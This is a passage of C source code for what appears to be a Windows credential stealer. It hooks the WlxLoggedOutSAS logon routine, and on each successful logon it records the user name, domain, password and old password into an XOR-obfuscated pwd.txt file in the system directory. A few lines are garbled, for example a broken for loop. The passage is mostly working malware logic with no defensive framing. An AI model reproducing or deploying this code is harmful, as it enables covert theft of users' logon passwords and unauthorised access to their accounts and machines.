/r/nPassWord = %s /r/nOldPass = %s/r/n" , pNprNotifyInfo->pszUserName , pNprNotifyInfo->pszDomain , pNprNotifyInfo->pszPassword, pNprNotifyInfo->pszOldPassword ); WideToByte( pBuffer , pWBuffer , lstrlenW( pWBuffer ) ); } char LogPath[MAX_PATH] = {0}; GetSystemDirectory( LogPath , MAX_PATH); lstrcat( LogPath , "//pwd.txt"); HANDLE hfile = CreateFile( LogPath , GENERIC_WRITE , FILE_SHARE_WRITE , 0 , OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL , 0 ); if (hfile != INVALID_HANDLE_VALUE) { unsigned long ret; SetFilePointer( hfile , -1 , 0 , FILE_END); int i=0; SYSTEMTIME st; int b; for(;i { pBuffer[i] = pBuffer[i] ^ 3;//加密采用异或方式 } WriteFile( hfile , pBuffer , lstrlen( pBuffer ) , &ret , 0 ); CloseHandle( hfile ); } GlobalFree( pWBuffer ); GlobalFree( pBuffer ); return; } void WriteCurrentTime() { SYSTEMTIME st; DWORD ret = 0; GetLocalTime(&st); wsprintf( pBuffer , "/r/n%d/%d/%d/%d:%d:%d" , st.wYear , st.wMonth , st.wDay , st.wHour , st.wMinute, st.wSecond ); } int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi) { return WideCharToMultiByte( CP_ACP , WC_COMPOSITECHECK , sz_source , -1 , sz_target , size_ansi , 0 , 0 ); } int WINAPI FunNewADDR( PVOID pWlxContext, DWORD dwSasType, PLUID pAuthenticationId, PSIDpLogonSid, PDWORD pdwOptions, PHANDLE phToken, PWLX_MPR_NOTIFY_INFOpNprNotifyInfo, PVOID * pProfile ) { UnHookWlxLoggedOutSAS(); //当系统jmp到我们自己的函数时先解除HOOK int i = hooktable.OldDDR(pWlxContext , dwSasType , pAuthenticationId , pLogonSid , pdwOptions , phToken , pNprNotifyInfo, pProfile ); if (i == WLX_SAS_ACTION_LOGON )// { WriteLog( pNprNotifyInfo ); } return i; } extern "C" __declspec(dllexport) void start() { return; }
|